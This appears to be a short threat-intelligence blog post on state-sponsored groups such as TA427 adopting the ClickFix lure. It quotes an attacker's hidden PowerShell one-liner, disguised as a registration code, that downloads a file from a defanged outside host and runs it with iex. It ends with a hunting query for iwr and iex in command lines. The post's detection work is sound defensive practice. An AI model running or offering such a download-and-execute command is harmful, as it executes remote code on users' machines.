112. State-Sponsored Threat Actors Adopted ClickFix Technique
Hello everyone! We've talked about ClickFix a few times already. But it's quite interesting how various adopt this technique.
According to Proofpoint report, multiple state-sponsored adversaries started to use this technique. For example, TA427 (we track this activity cluster under the name Monolithic Werewolf). The threat actor masquaraded malicious PowerShell command to look like a registration code:
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex
$c;
3Z5TY-76FR3-9G87H-7ZC56
As you can see, the command includes some very typical cmdlet names, for example, "iwr" and "iex". Of course, we can use it for hunting (or even detection!):
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
Have you observed any other interesting ClickFix adoptions?
See you tomorrow!
Comments
Post a Comment